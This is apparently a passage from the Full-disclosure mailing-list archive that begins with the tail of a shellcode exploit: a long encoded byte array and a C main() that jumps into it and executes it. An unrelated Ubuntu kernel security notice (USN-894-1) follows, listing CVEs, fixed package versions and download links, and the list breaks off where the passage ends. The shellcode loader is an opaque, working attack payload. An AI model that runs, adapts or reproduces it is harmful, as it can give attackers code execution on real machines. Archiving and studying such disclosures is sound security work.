"\xc7\x34\xe3\x4b\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3"
"\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xed\x3f"
"\xe3\x13\xa2\x57\x8c\x0f\xc7\x66\xa6\x35\x92\x66\xad\x32\xc7"
"\x72\xac\x33\xc7\x26\xf3\x70\xd7\x1e\xe3\x61\xc7\x34\xe3\x61"
"\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3\x61\xc7\x34\xe3"
"\x61\xc7\x34\xc9\x61\xc7\x34\xee\x61\xb3\x66\xa2\x28\x89\x7d"
"\xad\x26\xc7\x67\xa6\x32\x94\x7d\xac\x2f\x94\x34\xe8\x61\x84"
"\x7b\xad\x27\x82\x66\xa6\x2f\x84\x71\xc9\x4b\xcc\x34\x94\x24"
"\xc7\x75\xb1\x24\xc7\x75\xa0\x22\x82\x64\xb7\x28\x89\x73\xe3"
"\x32\x92\x76\xae\x28\x94\x67\xaa\x2e\x89\x67\xc9\x4b\xc7\x34"
"\xe3\x6c\xc7\x47\xaa\x2f\x80\x78\xa6\x61\x93\x66\xa2\x22\x8c"
"\x1e\xe3\x61\xc7\x39\xe3\x75\xd2\x39\xf5\x71\xc7\x79\xaa\x2f"
"\x92\x60\xa6\x61\x97\x66\xa6\x32\x82\x7a\xb7\x20\x93\x7d\xac"
"\x2f\x94\x38\xe3\x2e\x95\x34\xaf\x2e\x89\x73\xa6\x33\xcb\x34"
"\xb4\x24\xc7\x75\xb1\x24\xc7\x72\xaf\x24\x9f\x7d\xa1\x2d\x82"
"\x1e\xe3\x61\xc7\x39\xe3\x15\x8f\x71\xb1\x24\xc7\x63\xaa\x2d"
"\x8b\x34\xa1\x24\xc7\x60\xaa\x2c\x82\x34\xa5\x2e\x95\x34\xb0"
"\x29\x88\x66\xb7\x6d\xc7\x7d\xad\x27\x88\x66\xae\x20\x8b\x34"
"\xaf\x28\x80\x7c\xb7\x2f\x8e\x7a\xa4\x61\x93\x75\xaf\x2a\x94"
"\x1e\xc9\x6a\xc7\x51\xb0\x31\x82\x77\xaa\x20\x8b\x78\xba\x61"
"\x88\x7a\xe3\x35\x8f\x71\xb0\x24\xc7\x60\xac\x31\x8e\x77\xb0"
"\x4b\xed\x34\xe3\x61\xca\x34\x91\x24\x91\x71\xb1\x32\x82\x34"
"\xa6\x2f\x80\x7d\xad\x24\x82\x66\xaa\x2f\x80\x34\xeb\x12\x88"
"\x72\xb7\x36\x86\x66\xa6\x6d\xc7\x44\xb1\x2e\x93\x7b\xa0\x2e"
"\x8b\x67\xef\x61\xaf\x75\xb1\x25\x90\x75\xb1\x24\xcb\x34\x8b"
"\x34\x8a\x75\xad\x68\xed\x34\xe3\x61\xca\x34\x86\x39\x97\x78"
"\xac\x28\x93\x34\xa7\x24\x91\x71\xaf\x2e\x97\x79\xa6\x2f\x93"
"\x34\xa2\x2f\x83\x34\xb5\x34\x8b\x7a\xa6\x33\x86\x76\xaa\x2d"
"\x8e\x60\xba\x61\x86\x67\xb0\x24\x94\x67\xae\x24\x89\x60\xc9"
"\x61\xc7\x34\xee\x61\xa3\x75\xb7\x20\xc7\x75\xad\x20\x8b\x6d"
"\xb0\x28\x94\x34\xa2\x2f\x83\x34\xb5\x28\x94\x61\xa2\x2d\x8e"
"\x6e\xa2\x35\x8e\x7b\xad\x61\x93\x71\xa0\x29\x89\x7d\xb2\x34"
"\x82\x67\xc9\x61\xc7\x34\xee\x61\xa4\x66\xba\x31\x93\x7b\xe3"
"\x20\x89\x70\xe3\x20\x89\x7b\xad\x38\x8a\x7d\xb7\x38\xed\x34"
"\xe3\x61\xca\x34\x93\x29\x9e\x67\xaa\x22\x86\x78\xe3\x32\x82"
"\x77\xb6\x33\x8e\x60\xba\x61\x84\x7b\xb6\x2f\x93\x71\xb1\x2c"
"\x82\x75\xb0\x34\x95\x71\xb0\x4b\xc7\x34\xe3\x6c\xc7\x55\xad"
"\x38\x93\x7c\xaa\x2f\x80\x34\xa6\x2d\x8e\x60\xa6\x4b\xed\x3f"
"\xe3\x11\x8b\x71\xa2\x32\x82\x34\xaa\x2f\x84\x78\xb6\x25\x82"
"\x1e\xc9\x61\xc7\x34\xee\x61\xb4\x64\xa6\x20\x8c\x71\xb1\x61"
"\x89\x75\xae\x24\xcf\x67\xea\x61\x86\x7a\xa7\x6e\x88\x66\xe3"
"\x29\x86\x7a\xa7\x2d\x82\x1e\xe3\x61\xc7\x39\xe3\x02\x88\x7a"
"\xb7\x20\x84\x60\xe3\x28\x89\x72\xac\x33\x8a\x75\xb7\x28\x88"
"\x7a\xe3\x69\x82\x39\xae\x20\x8e\x78\xe3\x20\x89\x70\xe3\x22"
"\x82\x78\xaf\x61\x97\x7c\xac\x2f\x82\x3d\xc9\x61\xc7\x34\xee"
"\x61\xa5\x66\xaa\x24\x81\x34\xa1\x28\x88\x73\xb1\x20\x97\x7c"
"\xba\x4b\xc7\x34\xe3\x6c\xc7\x55\xad\x38\xc7\x64\xb1\x24\x94"
"\x71\xad\x35\x86\x60\xaa\x2e\x89\x34\x90\x34\x97\x64\xac\x33"
"\x93\x7d\xad\x26\xc7\x79\xa2\x35\x82\x66\xaa\x20\x8b\x67\xc9"
"\x61\xc7\x34\xee\x61\xb0\x7c\xba\x61\x8e\x60\xe3\x28\x94\x34"
"\xa0\x2e\x88\x78\xe3\x20\x89\x70\xec\x2e\x95\x34\xb4\x29\x9e"
"\x34\xba\x2e\x92\x34\xb4\x20\x89\x60\xe3\x35\x88\x34\xb3\x33"
"\x82\x67\xa6\x2f\x93\x34\xaa\x35\xc7\x1e\xc9\x6a\xc7\x4d\xac"
"\x34\xc7\x63\xa2\x2f\x93\x34\xb7\x2e\xc7\x67\xb3\x24\x86\x7f"
"\xe2\x4b\xed\x34\xe3\x61\xca\x34\x93\x2d\x82\x75\xb0\x24\xc7"
"\x67\xa6\x2f\x83\x34\xb7\x29\x82\x34\xa2\x23\x88\x62\xa6\x61"
"\x8e\x7a\xa5\x2e\x95\x79\xa2\x35\x8e\x7b\xad\x61\x93\x7b\xe3"
"\x4b\xc7\x34\xe3\x61\xc7\x77\xa5\x31\xd5\x24\xf2\x71\xc7\x3c"
"\xa2\x35\xce\x34\xb1\x24\x84\x7b\xad\x6f\x84\x6c\xe3\x23\x9e"
"\x34\xf2\x74\xc7\x59\xa2\x38\xcb\x34\xf1\x71\xd6\x24\xc9\x4b"
"\xca\x39\xee\x6c\xca\x56\x86\x06\xae\x5a\xe3\x11\xa0\x44\xe3"
"\x11\xb2\x56\x8f\x08\xa4\x34\x88\x04\xbe\x34\x81\x0d\xa8\x57"
"\x88\x6c\xca\x39\xee\x6c\xed\x42\xa6\x33\x94\x7d\xac\x2f\xdd"
"\x34\x84\x2f\x92\x44\x84\x61\x91\x25\xed\x75\xc9\x25\xf3\x61"
"\xcf\x50\xa2\x33\x90\x7d\xad\x68\xed\x1e\xae\x10\xa2\x5a\x81"
"\x04\x93\x65\x8e\x0f\xd3\x56\x80\x00\xa3\x56\x8a\x03\xa8\x72"
"\xf5\x2c\xac\x3f\x8b\x73\xb6\x63\xa5\x10\xbe\x7b\xb6\x38\xb5"
"\x21\xa8\x2a\x8c\x21\x8a\x2c\x95\x27\x88\x2c\xac\x6e\xa7\x6e"
"\x82\x53\xaa\x2c\xbf\x2d\xb0\x33\xa5\x71\x80\x20\x92\x5e\xc9"
"\x37\xac\x76\xf5\x0a\xd6\x51\x8d\x39\x90\x47\xad\x20\xd2\x2c"
"\xa4\x36\x83\x43\xec\x14\xbd\x21\xac\x0f\x86\x61\xba\x05\x92"
"\x7d\xad\x72\xad\x58\x9a\x13\xd7\x79\x87\x26\x9f\x41\xac\x79"
"\x94\x23\xa0\x19\x90\x72\xf3\x37\x8b\x60\xa0\x13\xd2\x58\x94"
"\x05\x95\x20\xfa\x4b\x84\x6e\xf0\x05\xa4\x23\xb1\x18\xd5\x40"
"\x93\x0d\xa3\x58\x8c\x77\xb7\x46\xf5\x2d\xa9\x6d\x85\x23\x93"
"\x46\x86\x6a\xb2\x4e\xec\x0e\x96\x63\x94\x33\xa9\x2d\xba\x0f"
"\x8c\x6d\x8f\x27\x8d\x3f\x8f\x73\xab\x20\x8e\x05\x85\x67\xa0"
"\x09\x94\x51\x82\x6a\xaf\x78\xb6\x33\xed\x56\x84\x6e\xd3\x40"
"\x8e\x74\xa1\x56\xb5\x3b\xd7\x58\x84\x70\x91\x24\xfb\x13\xaa"
"\x50\x89\x0f\xdf\x2c\x93\x30\xbd\x70\xa4\x73\x8b\x73\xa9\x22"
"\xd5\x58\x90\x6e\x80\x7f\xa0\x10\xac\x5a\x90\x78\xa3\x2d\xf3"
"\x03\xb3\x44\x8a\x0b\xd4\x67\x94\x11\xd0\x51\x95\x0d\x83\x1e"
"\x91\x2f\x8a\x4e\xf2\x73\xd7\x20\x90\x19\x96\x57\x99\x38\xa0"
"\x61\xa5\x2f\xd7\x26\x91\x04\xa3\x55\xf3\x35\xc8\x59\xf4\x16"
"\xaa\x56\x87\x35\xaf\x52\x85\x28\x88\x59\x92\x22\xd0\x5a\x97"
"\x20\xb0\x3b\xaa\x73\x90\x75\xa9\x0b\xb0\x7e\x9b\x06\xdf\x5c"
"\x88\x2b\x90\x25\xc9\x2a\x8b\x23\x95\x12\x8d\x51\xf2\x3b\xbd"
"\x4c\x93\x02\xdf\x65\xe8\x07\xa5\x5e\xf5\x72\xdf\x70\x90\x19"
"\xd7\x7a\xb3\x29\xb2\x7e\x99\x37\xd7\x6c\xab\x00\xa5\x51\x81"
"\x00\xa6\x53\xf3\x09\xa1\x5e\xaf\x18\xd5\x2d\xb6\x08\xa2\x5a"
"\x84\x14\xa4\x55\xfb\x18\xd5\x4e\xb4\x4b\xaa\x7e\x82\x39\xaa"
"\x51\x81\x38\xbd\x43\x8d\x37\x85\x7d\xf6\x2b\x82\x50\xf5\x0b"
"\xa6\x40\xf7\x04\xa2\x63\x86\x02\xa6\x57\xa4\x07\xa6\x7f\xb7"
"\x30\xaa\x5a\xf7\x02\xa0\x63\x8e\x07\xa4\x45\x87\x35\xb3\x73"
"\x82\x06\xa4\x63\xa8\x08\xa5\x63\x8e\x02\xa5\x7c\x96\x08\xed"
"\x55\xa4\x2a\xac\x57\xb4\x10\xb0\x55\xa4\x0c\xa5\x55\xab\x75"
"\xa5\x55\xab\x24\xa6\x55\x82\x2e\xad\x51\x8a\x12\xb0\x53\xb4"
"\x76\xa8\x7f\xb4\x76\xd6\x57\xf4\x18\xaf\x3b\xf3\x2c\xd5\x24"
"\xf0\x10\x96\x5c\xf6\x03\x93\x5c\xf5\x37\x86\x5e\x92\x74\xd1"
"\x43\xe8\x38\xa8\x1e\x8a\x78\xd7\x6c\x96\x2e\xaf\x5b\xa0\x0d"
"\xa4\x22\x89\x78\x8c\x65\x80\x22\xd2\x63\x9b\x0c\xa3\x27\xb2"
"\x1b\x96\x6d\xa2\x05\xbe\x3b\xf3\x20\xb4\x52\x88\x38\x92\x24"
"\xb5\x39\xa1\x23\x87\x12\x9d\x5b\xf5\x11\x89\x61\x84\x16\x91"
"\x3b\xec\x33\xad\x6c\xf5\x03\x8c\x52\xc9\x71\x95\x4d\xf5\x36"
"\x83\x51\x82\x74\x8e\x44\x97\x18\x84\x5c\x84\x76\xa6\x7c\xb7"
"\x77\xab\x58\x82\x2d\xde\x22\xb6\x78\xdf\x7f\x96\x12\xae\x41"
"\x8d\x0b\xbf\x26\xaf\x76\xcc\x58\xb5\x36\xad\x70\x89\x18\x80"
"\x7e\xbb\x36\xd3\x6e\x85\x09\xa8\x47\xa9\x22\xaf\x20\xa7\x4b"
"\x8a\x2c\x8c\x19\x8a\x21\xac\x0f\x97\x7a\xa5\x31\x94\x40\x96"
"\x12\xb3\x52\x9b\x04\x82\x40\x8c\x2f\xb7\x21\x96\x3b\xc8\x70"
"\xac\x25\xb0\x7b\xa7\x29\x8b\x42\xb7\x15\xd0\x27\x9a\x08\xb2"
"\x51\xb1\x77\xa5\x43\x8d\x16\xb5\x42\x89\x06\xa1\x73\xfa\x02"
"\x89\x7b\xb2\x38\xed\x59\xf6\x74\xa2\x58\xf7\x29\xb6\x65\xab"
"\x0c\xbe\x5e\x87\x32\xb5\x6d\x96\x30\x89\x43\x82\x39\xd4\x57"
"\x89\x71\x9f\x65\xa7\x00\xd3\x70\x8b\x27\x93\x25\x80\x08\xd7"
"\x22\xba\x76\xbd\x22\x85\x09\xb5\x3f\x89\x72\xa0\x6d\xb2\x1b"
"\xb7\x7d\xa9\x0b\xa2\x6c\xf7\x10\x89\x1e\x97\x33\xd7\x63\xfa"
"\x36\xde\x57\x8a\x6e\xbe\x4c\xf3\x10\xad\x44\xb6\x2e\x94\x41"
"\x8b\x31\x90\x43\xb6\x2d\xb0\x56\x92\x13\xbf\x42\xba\x25\xa4"
"\x3b\xf6\x3b\x81\x56\xe8\x38\xd7\x47\xf1\x06\xb2\x6e\xf1\x23"
"\xcc\x7f\xa5\x20\xcc\x64\xa1\x23\x86\x75\x86\x20\xa0\x21\xc9"
"\x00\xb6\x24\x86\x12\xd5\x7b\xb4\x72\x80\x51\x8a\x00\xab\x41"
"\x88\x39\x82\x73\xf3\x27\x8f\x6e\xaa\x33\x80\x7f\xaf\x22\xbf"
"\x4d\x81\x31\x86\x7f\xb7\x31\x97\x64\xb5\x27\x9d\x5f\xe8\x07"
"\xa0\x5c\x8a\x15\x91\x70\x88\x76\x9d\x57\xf2\x2b\xb5\x67\x91"
"\x11\xb2\x5d\xb2\x4b\xa1\x25\xad\x0d\x8f\x4d\xaf\x04\x97\x23"
"\xa4\x03\xa8\x26\x91\x0e\xaa\x4c\x80\x08\x9e\x45\xaa\x6a\xa0"
"\x27\xa5\x2b\xb3\x66\x90\x16\x86\x5e\xae\x70\x85\x5e\x99\x14"
"\x8b\x2d\xad\x36\xb0\x58\x90\x71\x80\x66\xf5\x72\xd2\x6e\xa9"
"\x26\xae\x58\xfa\x19\xc8\x7d\xb0\x06\xed\x7e\xad\x77\xad\x5b"
"\x97\x2d\x9d\x5c\x9b\x27\x9d\x41\xb6\x22\x89\x72\x80\x74\xaa"
"\x3f\xa9\x2c\x8a\x5e\x99\x02\xb6\x57\x95\x12\xd7\x7a\xf2\x2b"
"\x97\x57\xb0\x35\x8b\x61\xec\x71\xb5\x59\xa0\x05\x8b\x3b\x8b"
"\x76\xb2\x44\x93\x0a\x8c\x71\xe8\x27\x88\x55\xaf\x2d\xc8\x1e"
"\xb3\x15\x96\x77\x95\x0b\x9d\x4e\x94\x26\xb1\x62\xba\x07\xb5"
"\x5d\xec\x71\xb4\x4c\x96\x6e\xd1\x27\xa7\x25\xaf\x76\xf1\x05"
"\x89\x24\xa9\x0a\xad\x22\x94\x0d\x88\x3f\x95\x79\xb2\x76\x9a"
"\x0b\xb4\x76\x9a\x07\xd4\x50\xf2\x1b\xd3\x6c\x96\x14\x8c\x5c"
"\xa5\x77\xb7\x4d\xc9\x39\xa8\x24\x96\x0e\x83\x7d\x85\x2f\x8c"
"\x72\xb5\x09\x83\x2d\xf0\x79\xbf\x22\xb7\x10\x91\x71\x8f\x06"
"\xcc\x78\x91\x2f\xdf\x5f\xec\x1b\xbf\x60\x97\x0d\x92\x6e\xb7"
"\x05\x8a\x24\xf7\x19\x8f\x62\x96\x13\x92\x7e\x88\x31\xaf\x62"
"\xac\x2a\xd7\x5b\xf6\x28\x89\x72\x92\x4b\x8a\x46\x97\x0c\x89"
"\x5c\xa5\x2d\xc8\x24\xa2\x25\xaf\x55\xf3\x2e\xa9\x41\xaa\x0c"
"\xa9\x7b\x8a\x34\xb0\x46\x89\x36\xb5\x44\xa9\x6e\x97\x64\xa0"
"\x00\xa2\x45\x86\x00\xa6\x4d\xa8\x03\xad\x45\x92\x18\xa6\x45"
"\x8a\x00\xa3\x63\x96\x02\xb4\x26\xac\x36\xd4\x73\x8a\x23\xed"
"\x50\x82\x14\xad\x55\x8c\x70\xa8\x55\x82\x00\xac\x57\x91\x02"
"\xa2\x78\xab\x32\xa8\x6e\xb3\x0c\xa8\x2d\x9a\x38\xb4\x56\xec"
"\x78\xb2\x42\x93\x23\x8e\x76\xf5\x16\xbd\x42\x87\x18\x83\x5d"
"\x9a\x79\x91\x5a\x94\x31\xde\x5f\xf2\x76\xb4\x3b\xb1\x6e\x8f"
"\x75\x93\x2f\x8c\x1e\xfa\x74\x96\x73\xbb\x34\xa4\x5c\x96\x77"
"\xd5\x47\xf7\x0d\x8b\x57\x8a\x25\xa9\x47\xec\x00\x85\x78\x81"
"\x72\x91\x3b\x9b\x75\xd5\x77\x8a\x26\xd4\x76\xb5\x37\xb0\x61"
"\x8a\x03\x8d\x46\xfa\x20\x9e\x63\xb4\x6a\xd6\x5f\x81\x00\x81"
"\x44\x8c\x17\x83\x59\x91\x05\x81\x65\xc9\x6a\xd1\x50\x90\x03"
"\x96\x6c\x8d\x70\xa9\x62\xa1\x08\x93\x51\xf2\x12\xde\x24\x8c"
"\x79\x91\x44\xbb\x26\xa2\x45\xa0\x14\xa4\x3f\x99\x6e\x80\x64"
"\x85\x79\xaa\x53\x8b\x75\xb3\x20\xbb\x22\xb7\x67\x95\x08\xd5"
"\x47\xf4\x30\xab\x7e\xa5\x1b\x83\x56\xaa\x06\x9d\x6d\xf3\x4b"
"\xa4\x43\x96\x79\x8e\x7d\x9a\x11\xa2\x27\x89\x04\xde\x20\x91"
"\x2e\x88\x60\xaa\x2f\xd2\x6d\x89\x23\x9e\x5c\xaf\x24\x8c\x21"
"\xec\x03\xb2\x63\xe8\x72\x93\x53\xa8\x2a\xb0\x4e\x87\x14\xb1"
"\x25\x94\x36\xd0\x52\x93\x25\x93\x45\x92\x0b\xb4\x7a\x8b\x23"
"\xb2\x65\x93\x72\xed\x27\xae\x07\xd5\x47\xb0\x77\xd2\x62\xbb"
"\x20\x93\x79\xa6\x08\x91\x5a\x8f\x72\xa1\x52\x8f\x24\xb4\x7b"
"\xa8\x00\xa5\x5f\xa6\x2e\xb7\x4e\xa7\x72\xd2\x7a\x89\x11\xd6"
"\x47\xad\x36\xd3\x63\xf7\x2d\xb0\x55\xfa\x72\x94\x40\xec\x20"
"\xcc\x76\xf1\x06\xbe\x7e\x8f\x35\x85\x1e\xb1\x20\x97\x7f\xe8"
"\x76\x94\x4d\xb1\x28\x93\x2d\xf1\x2a\xae\x27\xb6\x00\xd1\x65"
"\xb4\x2e\xa0\x2d\xb5\x0c\xcc\x44\xb9\x0b\x86\x67\x88\x09\xb3"
"\x2c\xa9\x08\x9e\x75\xb6\x2a\xd1\x46\xb0\x17\xa6\x76\xa2\x73"
"\xaa\x53\xc9\x7c\xb3\x53\x88\x03\xed\x39\xee\x6c\xca\x39\x86"
"\x0f\xa3\x34\x93\x06\xb7\x34\x93\x14\xa5\x58\x8a\x02\xc7\x5f"
"\x86\x18\xc7\x56\x8f\x0e\xa4\x5f\xee\x6c\xca\x39\xee\x63\x9b"
"\x63\xa2\x2d\x8b\x1e\xc3\x16\xb4\x9d\x22\x8c\x67\x1e\xc3\x41";

void main(){
      int (*shell)();
      shell=buf;
      shell();
}




From kees at ubuntu.com  Fri Feb  5 02:23:42 2010
From: kees at ubuntu.com (Kees Cook)
Date: Thu, 4 Feb 2010 18:23:42 -0800
Subject: [Full-disclosure] [USN-894-1] Linux kernel vulnerabilities
Message-ID: <20100205022341.GN19355@outflux.net>

===========================================================
Ubuntu Security Notice USN-894-1          February 05, 2010
linux, linux-source-2.6.15 vulnerabilities
CVE-2009-4020, CVE-2009-4021, CVE-2009-4031, CVE-2009-4138,
CVE-2009-4141, CVE-2009-4308, CVE-2009-4536, CVE-2009-4538,
CVE-2010-0003, CVE-2010-0006, CVE-2010-0007, CVE-2010-0291
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04
Ubuntu 9.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  linux-image-2.6.15-55-386       2.6.15-55.82
  linux-image-2.6.15-55-686       2.6.15-55.82
  linux-image-2.6.15-55-amd64-generic  2.6.15-55.82
  linux-image-2.6.15-55-amd64-k8  2.6.15-55.82
  linux-image-2.6.15-55-amd64-server  2.6.15-55.82
  linux-image-2.6.15-55-amd64-xeon  2.6.15-55.82
  linux-image-2.6.15-55-hppa32    2.6.15-55.82
  linux-image-2.6.15-55-hppa32-smp  2.6.15-55.82
  linux-image-2.6.15-55-hppa64    2.6.15-55.82
  linux-image-2.6.15-55-hppa64-smp  2.6.15-55.82
  linux-image-2.6.15-55-itanium   2.6.15-55.82
  linux-image-2.6.15-55-itanium-smp  2.6.15-55.82
  linux-image-2.6.15-55-k7        2.6.15-55.82
  linux-image-2.6.15-55-mckinley  2.6.15-55.82
  linux-image-2.6.15-55-mckinley-smp  2.6.15-55.82
  linux-image-2.6.15-55-powerpc   2.6.15-55.82
  linux-image-2.6.15-55-powerpc-smp  2.6.15-55.82
  linux-image-2.6.15-55-powerpc64-smp  2.6.15-55.82
  linux-image-2.6.15-55-server    2.6.15-55.82
  linux-image-2.6.15-55-server-bigiron  2.6.15-55.82
  linux-image-2.6.15-55-sparc64   2.6.15-55.82
  linux-image-2.6.15-55-sparc64-smp  2.6.15-55.82

Ubuntu 8.04 LTS:
  linux-image-2.6.24-27-386       2.6.24-27.65
  linux-image-2.6.24-27-generic   2.6.24-27.65
  linux-image-2.6.24-27-hppa32    2.6.24-27.65
  linux-image-2.6.24-27-hppa64    2.6.24-27.65
  linux-image-2.6.24-27-itanium   2.6.24-27.65
  linux-image-2.6.24-27-lpia      2.6.24-27.65
  linux-image-2.6.24-27-lpiacompat  2.6.24-27.65
  linux-image-2.6.24-27-mckinley  2.6.24-27.65
  linux-image-2.6.24-27-openvz    2.6.24-27.65
  linux-image-2.6.24-27-powerpc   2.6.24-27.65
  linux-image-2.6.24-27-powerpc-smp  2.6.24-27.65
  linux-image-2.6.24-27-powerpc64-smp  2.6.24-27.65
  linux-image-2.6.24-27-rt        2.6.24-27.65
  linux-image-2.6.24-27-server    2.6.24-27.65
  linux-image-2.6.24-27-sparc64   2.6.24-27.65
  linux-image-2.6.24-27-sparc64-smp  2.6.24-27.65
  linux-image-2.6.24-27-virtual   2.6.24-27.65
  linux-image-2.6.24-27-xen       2.6.24-27.65

Ubuntu 8.10:
  linux-image-2.6.27-17-generic   2.6.27-17.45
  linux-image-2.6.27-17-server    2.6.27-17.45
  linux-image-2.6.27-17-virtual   2.6.27-17.45

Ubuntu 9.04:
  linux-image-2.6.28-18-generic   2.6.28-18.59
  linux-image-2.6.28-18-imx51     2.6.28-18.59
  linux-image-2.6.28-18-iop32x    2.6.28-18.59
  linux-image-2.6.28-18-ixp4xx    2.6.28-18.59
  linux-image-2.6.28-18-lpia      2.6.28-18.59
  linux-image-2.6.28-18-server    2.6.28-18.59
  linux-image-2.6.28-18-versatile  2.6.28-18.59
  linux-image-2.6.28-18-virtual   2.6.28-18.59

Ubuntu 9.10:
  kernel-image-2.6.31-108-imx51-di  2.6.31-108.21
  linux-image-2.6.31-19-386       2.6.31-19.56
  linux-image-2.6.31-19-generic   2.6.31-19.56
  linux-image-2.6.31-19-generic-pae  2.6.31-19.56
  linux-image-2.6.31-19-ia64      2.6.31-19.56
  linux-image-2.6.31-19-lpia      2.6.31-19.56
  linux-image-2.6.31-19-powerpc   2.6.31-19.56
  linux-image-2.6.31-19-powerpc-smp  2.6.31-19.56
  linux-image-2.6.31-19-powerpc64-smp  2.6.31-19.56
  linux-image-2.6.31-19-server    2.6.31-19.56
  linux-image-2.6.31-19-sparc64   2.6.31-19.56
  linux-image-2.6.31-19-sparc64-smp  2.6.31-19.56
  linux-image-2.6.31-19-virtual   2.6.31-19.56
  linux-image-2.6.31-211-dove     2.6.31-211.22
  linux-image-2.6.31-211-dove-z0  2.6.31-211.22
  linux-image-2.6.31-304-ec2      2.6.31-304.10

After a standard system upgrade you need to reboot your computer to
effect the necessary changes.

ATTENTION: Due to an unavoidable ABI change (except for Ubuntu 6.06)
the kernel updates have been given a new version number, which requires
you to recompile and reinstall all third party kernel modules you
might have installed. If you use linux-restricted-modules, you have to
update that package as well to get modules which work with the new kernel
version. Unless you manually uninstalled the standard kernel metapackages
(e.g. linux-generic, linux-server, linux-powerpc), a standard system
upgrade will automatically perform this as well.

Details follow:

Amerigo Wang and Eric Sesterhenn discovered that the HFS and ext4
filesystems did not correctly check certain disk structures. If a user
were tricked into mounting a specially crafted filesystem, a remote
attacker could crash the system or gain root privileges. (CVE-2009-4020,
CVE-2009-4308)

It was discovered that FUSE did not correctly check certain requests.
A local attacker with access to FUSE mounts could exploit this to
crash the system or possibly gain root privileges.  Ubuntu 9.10 was not
affected. (CVE-2009-4021)

It was discovered that KVM did not correctly decode certain guest
instructions.  A local attacker in a guest could exploit this to
trigger high scheduling latency in the host, leading to a denial of
service.  Ubuntu 6.06 was not affected. (CVE-2009-4031)

It was discovered that the OHCI fireware driver did not correctly
handle certain ioctls.  A local attacker could exploit this to crash
the system, or possibly gain root privileges.  Ubuntu 6.06 was not
affected. (CVE-2009-4138)

Tavis Ormandy discovered that the kernel did not correctly handle
O_ASYNC on locked files.  A local attacker could exploit this to gain
root privileges.  Only Ubuntu 9.04 and 9.10 were affected. (CVE-2009-4141)

Neil Horman and Eugene Teo discovered that the e1000 and e1000e
network drivers did not correctly check the size of Ethernet frames.
An attacker on the local network could send specially crafted traffic
to bypass packet filters, crash the system, or possibly gain root
privileges. (CVE-2009-4536, CVE-2009-4538)

It was discovered that "print-fatal-signals" reporting could show
arbitrary kernel memory contents.  A local attacker could exploit
this, leading to a loss of privacy.  By default this is disabled in
Ubuntu and did not affect Ubuntu 6.06. (CVE-2010-0003)

Olli Jarva and Tuomo Untinen discovered that IPv6 did not correctly
handle jumbo frames.  A remote attacker could exploit this to crash the
system, leading to a denial of service.  Only Ubuntu 9.04 and 9.10 were
affected. (CVE-2010-0006)

Florian Westphal discovered that bridging netfilter rules could be
modified by unprivileged users.  A local attacker could disrupt network
traffic, leading to a denial of service. (CVE-2010-0007)

Al Viro discovered that certain mremap operations could leak kernel
memory.  A local attacker could exploit this to consume all available
memory, leading to a denial of service. (CVE-2010-0291)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.diff.gz
      Size/MD5:  2928444 765d0254f54d27d447de8f0b39548848
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.dsc
      Size/MD5:     2921 682576890de917043eccf6fc9398aed2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz
      Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.82_all.deb
      Size/MD5:  5170062 ef1a9c95890c4ba600a3e5523d49bb59
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.82_all.deb
      Size/MD5:    96386 b184441d2f44037554d037d217688393
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82_all.deb
      Size/MD5: 44742098 b5215eb163e357a179dbf36169ae1fa2

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    22350 d8934981c2fdd09168a5e576cc1b809a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    44768 74be7582e8f82aeb48af59731ce128be
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:     2312 d464c76f98a4142add7a69aca1305739
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    36294 a65060e99feff7e2ecef38be6d92fbc3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:   102366 04d59c868ce03dc83b69116b022735b8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    38892 e80a653bb000e86f38da594d4bc1742d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    49160 a512718368004f81e83063ea8972c871
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:   176612 81ab4c185b3af1dea1a082283c1ec9b4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    36776 fcb0833daefa645545a2451824094b21
